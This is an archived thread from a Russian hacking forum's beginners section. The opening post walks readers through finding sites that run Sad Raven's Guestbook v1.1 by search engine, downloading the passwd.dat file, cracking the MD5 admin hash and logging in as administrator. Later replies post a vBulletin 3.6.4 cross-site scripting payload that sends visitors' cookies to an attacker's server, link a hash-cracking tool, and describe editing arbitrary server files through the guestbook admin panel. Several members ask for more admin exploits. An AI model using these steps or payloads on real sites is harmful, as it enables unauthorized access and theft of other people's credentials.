Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Делимся опытом

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> Делимся опытом
Имя
Сообщение << Старые топики   Новые топики >>
Делимся опытом - 2006-12-31 17:13:24.570000   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
Всем привет хочу поделиться опытом!!!
В данной статейке я расскажу про
поднятие админовских прав на гостевую
книгу Sad Raven's Guestbook v1.1

И так приступаем:

1)Идем конечно-же в любимый поисковик!
кому какой нравится,я лично пользовался
Rambler-ом.
Там вводим Sad Raven's Guestbook v1.1
Выходит много сайтов с данной гостевой
книгой.

2)Заходим на нужный нам сайт в гостевую книгу
примерно это выглядит так


3)Меняем последнюю строчку guest.php

на passwd.dat

4)Получаем Логин админа и пароль в зашифрованый
md5 хэше


5)Теперь мы дожны разбрутить этот хэш.
Я лично пользуюсь прогой MD5Inide

6)После того когда разбрутили пароль!!!
Нужно прописать вместо guest.php

admin

и тогда мы получаем приглашение в
Админ центр где и вводим наши полученные
логин и пароль!


7)После чего мы находимся в админ центре.

Теперь ВЫ добились желаемой цели.

Спасибо за внимание Над статьей работали
REDsaratov и Stefun!!!

чуть попозже я раскажу как залить шелл
через взлом гостевой книги.
Post #: 1
RE: Делимся опытом - 2006-12-31 17:42:17.046666   
ВИТАХА

Сообщений: 1017
Оценки: 0
Присоединился: 2006-12-27 00:18:16.020000
Спасибо за инфу,возьму на вооружение!респект!
Post #: 2
RE: Делимся опытом - 2006-12-31 18:25:38.690000   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

Спасибо за инфу,возьму на вооружение!респект!

Спасибо![sm=ay.gif][sm=az.gif]
Post #: 3
RE: Делимся опытом - 2006-12-31 18:52:30.210000   
KPOT_f!nd

Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
для новичков пойдеТ! А так нового нечего не открыЛ!

:@ZLOY
Post #: 4
RE: Делимся опытом - 2006-12-31 21:21:55.153333   
web_slayer

Сообщений: 932
Оценки: 0
Присоединился: 2006-12-15 23:59:09.653333
quote:

для новичков пойдеТ! А так нового нечего не открыЛ!

Ну ты действительно ZLOY. :D




REDsaratov , Stefun респект чуваки! (Жаль что это не везде работает).
Post #: 5
RE: Делимся опытом - 2006-12-31 23:24:47.636666   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

для новичков пойдеТ! А так нового нечего не открыЛ!

ясен пень!что-ж нового отркроешь!Специально для начинающих и делал это мой подарок на новый год!!!всем спасибо!:D:D:D
quote:

web_slayer:
REDsaratov , Stefun респект чуваки!

quote:

ВИТАХА:
Спасибо за инфу,возьму на вооружение!респект!

ПРИЯТНО КОГДА ЛЮДИ ВОТ ТАК ОЦЕНИВАЮТ:):D:D:D
Post #: 6
RE: Делимся опытом - 2007-01-02 01:01:28.893333   
k1ppregel

Сообщений: 171
Оценки: 0
Присоединился: 2006-11-14 00:20:22.693333
Чё интересно! Спасибо! Хоть кто-то что-то сделает, а не языком треплет.
Post #: 7
RE: Делимся опытом - 2007-01-02 01:19:44.143333   
Xakep9009

Сообщений: 1067
Оценки: 0
Присоединился: 2006-08-28 02:34:39
Руки проч от Майкла Джексона!!!!!
Прикольная статья….я бы мог выложить про phpBB
версию 2.0.10
Но это уже не актуально…..
Post #: 8
RE: Делимся опытом - 2007-01-02 01:27:05.210000   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

Руки проч от Майкла Джексона!!!!!
Прикольная статья….я бы мог выложить про phpBB
версию 2.0.10
Но это уже не актуально…..

да ладно выкладывай только очень подробно люди оценят!!!!!!:D:D:D:D:D:D
Post #: 9
RE: Делимся опытом - 2007-01-02 03:35:35.036666   
Pirate

Сообщений: 2
Оценки: 0
Присоединился: 2007-01-02 03:03:42.200000
Спасибо автору за ОПЫТ.
Раз уже упомянули про повер борд, то меня очень интерессует
Invision Power Board v2.1.7
А конкретно: как получить на форуме, построенном на этом движке права админов?
Всё это, конечно, в мирных целях и не принесёт вреда, как админам/модераторам, так и пользователяи.
Если кто рещится выложить статейку, то желательно поподробнее.
Заранее буду благодарен.
Post #: 10
RE: Делимся опытом - 2007-01-02 09:23:10.850000   
Tanzor

Сообщений: 98
Оценки: 0
Присоединился: 2006-04-21 17:45:29
Спасибо за совет начинающим!!! Не подскажиш где можно достать прогу MD5Inide?
если не жалко то скинь пожалуйста![&:] 
ser-gavrilov@yandex.ru
Post #: 11
RE: Делимся опытом - 2007-01-02 10:21:38.033333   
ВИТАХА

Сообщений: 1017
Оценки: 0
Присоединился: 2006-12-27 00:18:16.020000
Качай http://www.cracklab.ru/download.php?action=list&n=MzA=
И прога называется md5Inside
Post #: 12
RE: Делимся опытом - 2007-01-02 15:12:48.053333   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

Прикольная статья….я бы мог выложить про phpBB
версию 2.0.10

выкладывай желательно со скринами
Post #: 13
RE: Делимся опытом - 2007-01-03 01:54:18.953333   
k1ppregel

Сообщений: 171
Оценки: 0
Присоединился: 2006-11-14 00:20:22.693333
А может у кого есть сплоит для vBulletin v3.6.4?
Post #: 14
RE: Делимся опытом - 2007-01-03 16:04:57.790000   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

vBulletin v3.6.4

vBulletin v3.6.2 есть
Post #: 15
RE: Делимся опытом - 2007-01-03 16:12:18.983333   
Greaves

Сообщений: 2167
Оценки: 0
Присоединился: 2006-07-04 19:50:46

quote:

ORIGINAL: Pirate

Спасибо автору за ОПЫТ.
Раз уже упомянули про повер борд, то меня очень интерессует
Invision Power Board v2.1.7
А конкретно: как получить на форуме, построенном на этом движке права админов?
Всё это, конечно, в мирных целях и не принесёт вреда, как админам/модераторам, так и пользователяи.
Если кто рещится выложить статейку, то желательно поподробнее.
Заранее буду благодарен.


http://forum.xakep.ru/m_775666/tm.htm
Post #: 16
RE: Делимся опытом - 2007-01-03 16:42:40.710000   
Greaves

Сообщений: 2167
Оценки: 0
Присоединился: 2006-07-04 19:50:46
quote:

ORIGINAL: k1ppregel

А может у кого есть сплоит для vBulletin v3.6.4?



Выполнение произвольного SWF сценария в VBulletin


Программа: VBulletin 3.6.4

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке входящих запросов. Атакующий может выполнить SWF произвольный сценарий и выкрасть данные аутентификации cookie.

Пример:

getURL("javascript:function blab(){}var scriptNode = +document.createElement(script); document.getElementsByTagName(body)[0].appendChild(scriptNode);scriptNode.language=javascript;scriptNode.src= http://www.YourServer/UrPHPpage.php?Cookie=+document.cookie +;blab();");
Post #: 17
RE: Делимся опытом - 2007-01-03 17:03:32.646666   
TheFeaR

Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
вот читайте.. можно поиметь очень много…
http://johnny.ihackstuff.com/index.php?module=prodreviews
Post #: 18
RE: Делимся опытом - 2007-01-03 20:09:25.790000   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

http://johnny.ihackstuff.com/index.php?module=prodreviews

что не заходит!(может у меня опять мозила мозги епёт)
Post #: 19
RE: Делимся опытом - 2007-01-03 20:40:40.266666   
Greaves

Сообщений: 2167
Оценки: 0
Присоединился: 2006-07-04 19:50:46
У меня вообще какая-то фигня открывается:


Hi.


Normally, my site is here, but we're getting pounded with traffic so the site has curled up into the fetal position until things cool down.

Please check back later!

Thanks,
j0hnny
Post #: 20
RE: Делимся опытом - 2007-01-03 20:57:39.670000   
Dimonelite

Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
TO RedSatatov
ты считаешь себя мегамозгом, если выложил сюда СТАТЬЮ(просто ржунимагу) об уязвимости, которую открыли еще до нашей эры?

если кому интересно, http://security.nnov.ru/Mdocument950.html - здесь опубликовано мое письмо с подробным описанием другой уязвимости в той же версии(а может и более поздних/ранних) этой гостевухи. Уязвимость я нашел сам! Заодно привел фрагменты php-кода, т.е. из-за чего все баги.
Post #: 21
RE: Делимся опытом - 2007-01-03 21:02:56.206666   
TheFeaR

Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
quote:

ORIGINAL: Greaves

У меня вообще какая-то фигня открывается:


Hi.


Normally, my site is here, but we're getting pounded with traffic so the site has curled up into the fetal position until things cool down.

Please check back later!

Thanks,
j0hnny

у них там баги с хостингом открывает через раз и долго… кратко там запросы для хака через гугл


Post #: 22
RE: Делимся опытом - 2007-01-03 22:11:17.040000   
Greaves

Сообщений: 2167
Оценки: 0
Присоединился: 2006-07-04 19:50:46
Это типа как здесь: http://www.securitylab.ru/contest/212086.php
Post #: 23
RE: Делимся опытом - 2007-01-04 00:02:38.146666   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

Dimonelite

FUCK OF
quote:

ты считаешь себя мегамозгом

я не считаю себя мега мозгом!
quote:

просто ржунимагу

бедняга наверно угадился!
quote:

об уязвимости, которую открыли еще до нашей эры

я не знал что в то время была Sad Raven's Guestbook v1.1!:D
quote:

Уязвимость я нашел сам

запиши себя в книгу рекордов

В МОЕЙ СТАТЕЙКЕ РАЗВЕ БЫЛО НАПИСАНО ЧТО ИМЕННО Я НАШЕЛ УЯЗВИМОСТЬ
ЧТО Я МЕГА МОЗГ И ВСЁ ТАКОЕ!!!!!!
ТЫ НАХОДИШЬСЯ В РАЗДЕЛЕ ДЛЯ НАЧИНАЮЩИХ ВОТ И НАДО ЛЮДЯМ ПОДКИДЫВАТЬ ПОЛЕЗНЫЕ ИДЕИ И СТАТЬ!!!!!!!!!!!!!!!!!!!:@
Post #: 24
RE: Делимся опытом - 2007-01-04 01:10:19.930000   
Dimonelite

Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
тебе надо прививку от бешенства. во всех постах полно восклицательных знаков, с тобой явно что-то не впорядке.
З.Ы.Fuck Off пишется с двумя фф
Post #: 25
RE: Делимся опытом - 2007-01-04 01:13:40.370000   
TheFeaR

Сообщений: 1923
Оценки: 0
Присоединился: 2006-01-25 18:16:33
quote:

ORIGINAL: Dimonelite

тебе надо прививку от бешенства. во всех постах полно восклицательных знаков, с тобой явно что-то не впорядке.
З.Ы.Fuck Off пишется с двумя фф

Епть ну сам бы сюда написал..  люди не знали они благодарны. а ты пришел и начал опускать чела… имхе перед тем как критиковать выложил бы свои творения.
Post #: 26
RE: Делимся опытом - 2007-01-04 01:16:38.856666   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

Епть ну сам бы сюда написал.. люди не знали они благодарны. а ты пришел и начал опускать чела… имхе перед тем как критиковать выложил бы свои творения.

правильно говорит. TheFeaR - РЕСПЕКТ
Post #: 27
RE: Делимся опытом - 2007-01-04 12:42:50.620000   
Dimonelite

Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07

quote:

ORIGINAL: TheFeaR

quote:

ORIGINAL: Dimonelite

тебе надо прививку от бешенства. во всех постах полно восклицательных знаков, с тобой явно что-то не впорядке.
З.Ы.Fuck Off пишется с двумя фф

Епть ну сам бы сюда написал..  люди не знали они благодарны. а ты пришел и начал опускать чела… имхе перед тем как критиковать выложил бы свои творения.

да я так, слегонца… а творения по этой теме я выложил, читай посты выше…
Post #: 28
RE: Делимся опытом - 2007-01-05 00:43:14.116666   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

а творения по этой теме я выложил, читай посты выше…

не сюда - же! выкладывал - бы на этот сайт. базара небыло бы.меня нах.. заипали все умники которы приходят и выепываются!не нравится вали.ТВОИ ЗНАЕШЬ АВТОРСКИЕ ПРАВА НИКТО НЕ НАРУШАЛ:@:@:@:@:@:@.
Post #: 29
RE: Делимся опытом - 2007-01-05 15:58:44.023333   
Mishanok1

Сообщений: 213
Оценки: 0
Присоединился: 2006-12-30 11:14:03.373333
Спасибо за опыт, REDsaratov!!!!!! Рулез!
Post #: 30
RE: Делимся опытом - 2007-01-05 22:36:09.370000   
web_slayer

Сообщений: 932
Оценки: 0
Присоединился: 2006-12-15 23:59:09.653333
quote:

чуть попозже я раскажу как залить шелл
через взлом гостевой книги.

Все с нетерпеньем ждем-с :)
Post #: 31
RE: Делимся опытом - 2007-01-05 23:16:18.356666   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

Все с нетерпеньем ждем-с

где-то числа 18 напишу подробно
Post #: 32
RE: Делимся опытом - 2007-01-06 03:27:54.376666   
Dimonelite

Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
quote:

Применений можно найти много, достаточно того, что в админ-центре в разделе ДИЗАЙН
возможно редактировать файлы design/header.inc.php и design/footer.inc.php…
Но есть еще одна интересная особенность:
В разделе НАСТРОЙКИ можно поменять путь к файлу header.inc.php, там можно вместо этого
файла прописать вообще любой! например, просто config.inc.php. таким образом, в разделе
ДИЗАЙН можно отредактировать любой файл(предварительно прописав его в разделе НАСТРОЙКИ)

видимо та ссылка никого не волновала )
Post #: 33
RE: Делимся опытом - 2007-01-06 14:06:57.526666   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
quote:

видимо та ссылка никого не волновала )

да клали все на твою ссылку!:@
Post #: 34
RE: Делимся опытом - 2007-01-07 02:56:01.603333   
k1ppregel

Сообщений: 171
Оценки: 0
Присоединился: 2006-11-14 00:20:22.693333
2REDsaratov, у тебя нормальная статья. Кому она не нравиться - забей на них и всё. А то гнилой базар от определённых личностей читать не хочется. А так тебе респект;). Жду чё-нить нового!
Post #: 35
RE: Делимся опытом - 2007-01-07 05:58:48.320000   
Grekaa

Сообщений: 359
Оценки: 0
Присоединился: 2006-11-13 00:35:04.520000
Всё это кульно, статейки с иллюстрациями.
Вы знающие люди не стесняйтесь писать, делиться опытом так скать.
Post #: 36
RE: Делимся опытом - 2007-01-07 09:55:58.500000   
Greaves

Сообщений: 2167
Оценки: 0
Присоединился: 2006-07-04 19:50:46
Хорошая статья!
Post #: 37
RE: Делимся опытом - 2007-01-07 16:46:00.360000   
User

Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
спасиб что поддержали меня!будем стараться над следующими статьями!просто очень нутарно подготавливать статьи с картинками!ну посколько на форуме не первый день надо выкладывать полезный материал!:D:D
Post #: 38
RE: Делимся опытом - 2007-01-07 20:20:19.820000   
k1ppregel

Сообщений: 171
Оценки: 0
Присоединился: 2006-11-14 00:20:22.693333
quote:

очень нутарно подготавливать статьи с картинками

Попробуй без картинок чё-нить выложить.
Post #: 39
RE: Делимся опытом - 2007-01-07 20:26:23.213333   
Greaves

Сообщений: 2167
Оценки: 0
Присоединился: 2006-07-04 19:50:46
Без картинок не так показательно и познавательно )))
Post #: 40
Страниц:  [1] 2
Все форумы >> [Для начинающих] >> Делимся опытом







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.